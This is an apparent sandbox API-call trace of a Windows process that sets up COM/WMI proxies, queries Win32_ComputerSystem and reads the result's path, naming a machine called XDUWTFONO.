	[0211.836] WbemLocator:IClientSecurity:SetBlanket (This=0x1b83c740, pProxy=0x1cd1aec8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0211.836] WbemLocator:IUnknown:Release (This=0x1b83c740) returned 0x2
	[0211.837] WbemLocator:IUnknown:Release (This=0x1b83c780) returned 0x1
	[0211.837] CoTaskMemFree (pv=0x1b839b30) 
	[0211.837] WbemLocator:IUnknown:Release (This=0x1cd11de0) returned 0x0
	[0211.837] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1aec8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec490 | out: ppvObject=0x1c6ec490*=0x1b83c780) returned 0x0
	[0211.837] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c780, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec510 | out: ppvObject=0x1c6ec510*=0x0) returned 0x80004002
	[0211.838] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c780, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec2a8 | out: ppvObject=0x1c6ec2a8*=0x0) returned 0x80004002
	[0211.838] WbemLocator:IUnknown:AddRef (This=0x1b83c780) returned 0x3
	[0211.838] CoGetContextToken (in: pToken=0x1c6ec160 | out: pToken=0x1c6ec160) returned 0x0
	[0211.838] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c780, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec120 | out: ppvObject=0x1c6ec120*=0x1b83c668) returned 0x0
	[0211.839] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c668, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec150 | out: pCid=0x1c6ec150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.839] WbemLocator:IUnknown:Release (This=0x1b83c668) returned 0x3
	[0211.839] CoGetContextToken (in: pToken=0x1c6ec130 | out: pToken=0x1c6ec130) returned 0x0
	[0211.839] WbemLocator:IUnknown:AddRef (This=0x1b83c780) returned 0x4
	[0211.839] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c780, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec248 | out: ppvObject=0x1c6ec248*=0x1b83c750) returned 0x0
	[0211.839] WbemLocator:IUnknown:Release (This=0x1b83c780) returned 0x4
	[0211.839] WbemLocator:IRpcOptions:Query (in: This=0x1b83c750, pPrx=0x1b83c780, dwProperty=2, pdwValue=0x1c6ec2b8 | out: pdwValue=0x1c6ec2b8) returned 0x80004002
	[0211.839] WbemLocator:IUnknown:Release (This=0x1b83c750) returned 0x3
	[0211.840] WbemLocator:IUnknown:Release (This=0x1b83c780) returned 0x2
	[0211.840] CoGetContextToken (in: pToken=0x1c6ec630 | out: pToken=0x1c6ec630) returned 0x0
	[0211.840] CoGetContextToken (in: pToken=0x1c6ec570 | out: pToken=0x1c6ec570) returned 0x0
	[0211.840] WbemLocator:IUnknown:AddRef (This=0x1b83c780) returned 0x3
	[0211.840] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c780, riid=0x1c6ec6b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec690 | out: ppvObject=0x1c6ec690*=0x1cd1aec8) returned 0x0
	[0211.840] WbemLocator:IUnknown:Release (This=0x1b83c780) returned 0x3
	[0211.840] WbemLocator:IUnknown:Release (This=0x1cd1aec8) returned 0x2
	[0211.840] WbemLocator:IUnknown:Release (This=0x1cd1aec8) returned 0x1
	[0211.841] CoGetContextToken (in: pToken=0x1c6ecc30 | out: pToken=0x1c6ecc30) returned 0x0
	[0211.841] WbemLocator:IUnknown:AddRef (This=0x1b83c780) returned 0x2
	[0211.841] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c780, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec800 | out: ppvObject=0x1c6ec800*=0x1b83c780) returned 0x0
	[0211.841] WbemLocator:IUnknown:Release (This=0x1b83c780) returned 0x2
	[0211.841] WbemLocator:IUnknown:Release (This=0x1b83c780) returned 0x1
	[0211.841] CoGetContextToken (in: pToken=0x1c6ec8d0 | out: pToken=0x1c6ec8d0) returned 0x0
	[0211.841] CoGetContextToken (in: pToken=0x1c6ec810 | out: pToken=0x1c6ec810) returned 0x0
	[0211.841] WbemLocator:IUnknown:AddRef (This=0x1b83c780) returned 0x2
	[0211.841] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c780, riid=0x1c6ec950*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec930 | out: ppvObject=0x1c6ec930*=0x1cd1aec8) returned 0x0
	[0211.842] WbemLocator:IUnknown:Release (This=0x1b83c780) returned 0x2
	[0211.842] WbemLocator:IUnknown:AddRef (This=0x1cd1aec8) returned 0x3
	[0211.842] IWbemServices:ExecQuery (in: This=0x1cd1aec8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c6ecdc8 | out: ppEnum=0x1c6ecdc8*=0x1cd20798) returned 0x0
	[0211.848] IUnknown:QueryInterface (in: This=0x1cd20798, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9d8 | out: ppvObject=0x1c6ec9d8*=0x1cd207a0) returned 0x0
	[0211.848] IClientSecurity:QueryBlanket (in: This=0x1cd207a0, pProxy=0x1cd20798, pAuthnSvc=0x1c6ec9d0, pAuthzSvc=0x1c6ec9cc, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8, pImpLevel=0x1c6ec9e4, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0 | out: pAuthnSvc=0x1c6ec9d0*=0xa, pAuthzSvc=0x1c6ec9cc*=0x0, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8*=0x6, pImpLevel=0x1c6ec9e4*=0x2, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0*=0x1) returned 0x0
	[0211.848] IUnknown:Release (This=0x1cd207a0) returned 0x1
	[0211.848] IUnknown:QueryInterface (in: This=0x1cd20798, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec978 | out: ppvObject=0x1c6ec978*=0x1b83c600) returned 0x0
	[0211.848] IUnknown:QueryInterface (in: This=0x1cd20798, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec908 | out: ppvObject=0x1c6ec908*=0x1cd207a0) returned 0x0
	[0211.848] IClientSecurity:SetBlanket (This=0x1cd207a0, pProxy=0x1cd20798, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0211.866] IUnknown:Release (This=0x1cd207a0) returned 0x2
	[0211.866] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x1
	[0211.866] CoTaskMemFree (pv=0x1b839b90) 
	[0211.866] IUnknown:QueryInterface (in: This=0x1cd20798, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5b0 | out: ppvObject=0x1c6ec5b0*=0x1b83c600) returned 0x0
	[0211.866] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec630 | out: ppvObject=0x1c6ec630*=0x0) returned 0x80004002
	[0211.867] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec3c8 | out: ppvObject=0x1c6ec3c8*=0x0) returned 0x80004002
	[0211.868] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x3
	[0211.868] CoGetContextToken (in: pToken=0x1c6ec280 | out: pToken=0x1c6ec280) returned 0x0
	[0211.868] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec240 | out: ppvObject=0x1c6ec240*=0x1b83c4e8) returned 0x0
	[0211.868] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c4e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec270 | out: pCid=0x1c6ec270*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.868] WbemLocator:IUnknown:Release (This=0x1b83c4e8) returned 0x3
	[0211.868] CoGetContextToken (in: pToken=0x1c6ec250 | out: pToken=0x1c6ec250) returned 0x0
	[0211.868] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x4
	[0211.869] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec368 | out: ppvObject=0x1c6ec368*=0x1b83c5d0) returned 0x0
	[0211.869] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x4
	[0211.869] WbemLocator:IRpcOptions:Query (in: This=0x1b83c5d0, pPrx=0x1b83c600, dwProperty=2, pdwValue=0x1c6ec3d8 | out: pdwValue=0x1c6ec3d8) returned 0x80004002
	[0211.869] WbemLocator:IUnknown:Release (This=0x1b83c5d0) returned 0x3
	[0211.869] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x2
	[0211.869] CoGetContextToken (in: pToken=0x1c6ec750 | out: pToken=0x1c6ec750) returned 0x0
	[0211.869] CoGetContextToken (in: pToken=0x1c6ec690 | out: pToken=0x1c6ec690) returned 0x0
	[0211.869] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x3
	[0211.869] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x1c6ec7d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec7b0 | out: ppvObject=0x1c6ec7b0*=0x1cd20798) returned 0x0
	[0211.870] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x3
	[0211.870] IUnknown:Release (This=0x1cd20798) returned 0x2
	[0211.870] IUnknown:Release (This=0x1cd20798) returned 0x1
	[0211.870] WbemLocator:IUnknown:Release (This=0x1cd1aec8) returned 0x2
	[0211.870] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6ecd70 | out: puCount=0x1c6ecd70*=0x2) returned 0x0
	[0211.870] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecd70*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd70*=0x17, pszText=0x0) returned 0x0
	[0211.870] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecd70*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd70*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.870] CoGetContextToken (in: pToken=0x1c6ec970 | out: pToken=0x1c6ec970) returned 0x0
	[0211.870] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0211.870] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x2
	[0211.871] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x1c6ec9f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec9d0 | out: ppvObject=0x1c6ec9d0*=0x1cd20798) returned 0x0
	[0211.871] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x2
	[0211.871] IUnknown:AddRef (This=0x1cd20798) returned 0x3
	[0211.871] IEnumWbemClassObject:Clone (in: This=0x1cd20798, ppEnum=0x1c6ece30 | out: ppEnum=0x1c6ece30*=0x1cd208e8) returned 0x0
	[0211.872] IUnknown:QueryInterface (in: This=0x1cd208e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca88 | out: ppvObject=0x1c6eca88*=0x1cd208f0) returned 0x0
	[0211.872] IClientSecurity:QueryBlanket (in: This=0x1cd208f0, pProxy=0x1cd208e8, pAuthnSvc=0x1c6eca80, pAuthzSvc=0x1c6eca7c, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78, pImpLevel=0x1c6eca94, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90 | out: pAuthnSvc=0x1c6eca80*=0xa, pAuthzSvc=0x1c6eca7c*=0x0, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78*=0x6, pImpLevel=0x1c6eca94*=0x2, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90*=0x1) returned 0x0
	[0211.872] IUnknown:Release (This=0x1cd208f0) returned 0x1
	[0211.872] IUnknown:QueryInterface (in: This=0x1cd208e8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca28 | out: ppvObject=0x1c6eca28*=0x1b83ca80) returned 0x0
	[0211.872] IUnknown:QueryInterface (in: This=0x1cd208e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9b8 | out: ppvObject=0x1c6ec9b8*=0x1cd208f0) returned 0x0
	[0211.872] IClientSecurity:SetBlanket (This=0x1cd208f0, pProxy=0x1cd208e8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0211.875] IUnknown:Release (This=0x1cd208f0) returned 0x2
	[0211.875] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x1
	[0211.875] CoTaskMemFree (pv=0x1b8395c0) 
	[0211.875] IUnknown:QueryInterface (in: This=0x1cd208e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec650 | out: ppvObject=0x1c6ec650*=0x1b83ca80) returned 0x0
	[0211.875] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec6d0 | out: ppvObject=0x1c6ec6d0*=0x0) returned 0x80004002
	[0211.876] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec468 | out: ppvObject=0x1c6ec468*=0x0) returned 0x80004002
	[0211.876] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x3
	[0211.876] CoGetContextToken (in: pToken=0x1c6ec320 | out: pToken=0x1c6ec320) returned 0x0
	[0211.876] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec2e0 | out: ppvObject=0x1c6ec2e0*=0x1b83c968) returned 0x0
	[0211.877] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c968, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec310 | out: pCid=0x1c6ec310*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.877] WbemLocator:IUnknown:Release (This=0x1b83c968) returned 0x3
	[0211.877] CoGetContextToken (in: pToken=0x1c6ec2f0 | out: pToken=0x1c6ec2f0) returned 0x0
	[0211.877] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x4
	[0211.877] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec408 | out: ppvObject=0x1c6ec408*=0x1b83ca50) returned 0x0
	[0211.877] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x4
	[0211.877] WbemLocator:IRpcOptions:Query (in: This=0x1b83ca50, pPrx=0x1b83ca80, dwProperty=2, pdwValue=0x1c6ec478 | out: pdwValue=0x1c6ec478) returned 0x80004002
	[0211.877] WbemLocator:IUnknown:Release (This=0x1b83ca50) returned 0x3
	[0211.878] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x2
	[0211.878] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0211.878] CoGetContextToken (in: pToken=0x1c6ec730 | out: pToken=0x1c6ec730) returned 0x0
	[0211.878] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x3
	[0211.878] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x1c6ec870*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec850 | out: ppvObject=0x1c6ec850*=0x1cd208e8) returned 0x0
	[0211.878] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x3
	[0211.878] IUnknown:Release (This=0x1cd208e8) returned 0x2
	[0211.878] IUnknown:Release (This=0x1cd208e8) returned 0x1
	[0211.878] IUnknown:Release (This=0x1cd20798) returned 0x2
	[0211.879] CoGetContextToken (in: pToken=0x1c6ecbf0 | out: pToken=0x1c6ecbf0) returned 0x0
	[0211.879] CoGetContextToken (in: pToken=0x1c6ecb30 | out: pToken=0x1c6ecb30) returned 0x0
	[0211.879] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x2
	[0211.879] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x1c6ecc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ecc50 | out: ppvObject=0x1c6ecc50*=0x1cd208e8) returned 0x0
	[0211.879] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x2
	[0211.879] IUnknown:AddRef (This=0x1cd208e8) returned 0x3
	[0211.879] IEnumWbemClassObject:Reset (This=0x1cd208e8) returned 0x0
	[0211.880] IUnknown:Release (This=0x1cd208e8) returned 0x2
	[0211.880] CoTaskMemAlloc (cb=0x8) returned 0x1b83b890
	[0211.880] IEnumWbemClassObject:Next (in: This=0x1cd208e8, lTimeout=-1, uCount=0x1, apObjects=0x1b83b890, puReturned=0x1c6ece78 | out: apObjects=0x1b83b890*=0x1cd20950, puReturned=0x1c6ece78*=0x1) returned 0x0
	[0211.882] IUnknown:QueryInterface (in: This=0x1cd20950, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec1a0 | out: ppvObject=0x1c6ec1a0*=0x1cd20950) returned 0x0
	[0211.883] IUnknown:QueryInterface (in: This=0x1cd20950, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec220 | out: ppvObject=0x1c6ec220*=0x0) returned 0x80004002
	[0211.883] IUnknown:QueryInterface (in: This=0x1cd20950, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ebfb8 | out: ppvObject=0x1c6ebfb8*=0x0) returned 0x80004002
	[0211.883] IUnknown:AddRef (This=0x1cd20950) returned 0x3
	[0211.883] CoGetContextToken (in: pToken=0x1c6ebe70 | out: pToken=0x1c6ebe70) returned 0x0
	[0211.883] IUnknown:QueryInterface (in: This=0x1cd20950, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebe30 | out: ppvObject=0x1c6ebe30*=0x1cd20958) returned 0x0
	[0211.883] IMarshal:GetUnmarshalClass (in: This=0x1cd20958, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebe60 | out: pCid=0x1c6ebe60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0211.883] IUnknown:Release (This=0x1cd20958) returned 0x3
	[0211.884] CoGetContextToken (in: pToken=0x1c6ebe40 | out: pToken=0x1c6ebe40) returned 0x0
	[0211.884] IUnknown:AddRef (This=0x1cd20950) returned 0x4
	[0211.884] IUnknown:QueryInterface (in: This=0x1cd20950, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebf58 | out: ppvObject=0x1c6ebf58*=0x0) returned 0x80004002
	[0211.884] IUnknown:Release (This=0x1cd20950) returned 0x3
	[0211.884] IUnknown:Release (This=0x1cd20950) returned 0x2
	[0211.884] CoGetContextToken (in: pToken=0x1c6ec300 | out: pToken=0x1c6ec300) returned 0x0
	[0211.884] CoGetContextToken (in: pToken=0x1c6ec240 | out: pToken=0x1c6ec240) returned 0x0
	[0211.884] IUnknown:AddRef (This=0x1cd20950) returned 0x3
	[0211.884] IUnknown:QueryInterface (in: This=0x1cd20950, riid=0x1c6ec380*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec360 | out: ppvObject=0x1c6ec360*=0x1cd20950) returned 0x0
	[0211.885] IUnknown:Release (This=0x1cd20950) returned 0x3
	[0211.885] IUnknown:Release (This=0x1cd20950) returned 0x2
	[0211.885] IUnknown:Release (This=0x1cd20950) returned 0x1
	[0211.885] CoTaskMemFree (pv=0x1b83b890) 
	[0211.885] CoGetContextToken (in: pToken=0x1c6ecc80 | out: pToken=0x1c6ecc80) returned 0x0
	[0211.885] IUnknown:AddRef (This=0x1cd20950) returned 0x2
	[0211.885] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__GENUS", lFlags=0, pVal=0x1c6ecdf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecdec*=0, plFlavor=0x1c6ecde8*=0 | out: pVal=0x1c6ecdf0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ecdec*=3, plFlavor=0x1c6ecde8*=64) returned 0x0
	[0211.885] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__PATH", lFlags=0, pVal=0x1c6ecd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd8c*=0, plFlavor=0x1c6ecd88*=0 | out: pVal=0x1c6ecd90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ecd8c*=8, plFlavor=0x1c6ecd88*=64) returned 0x0
	[0211.885] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
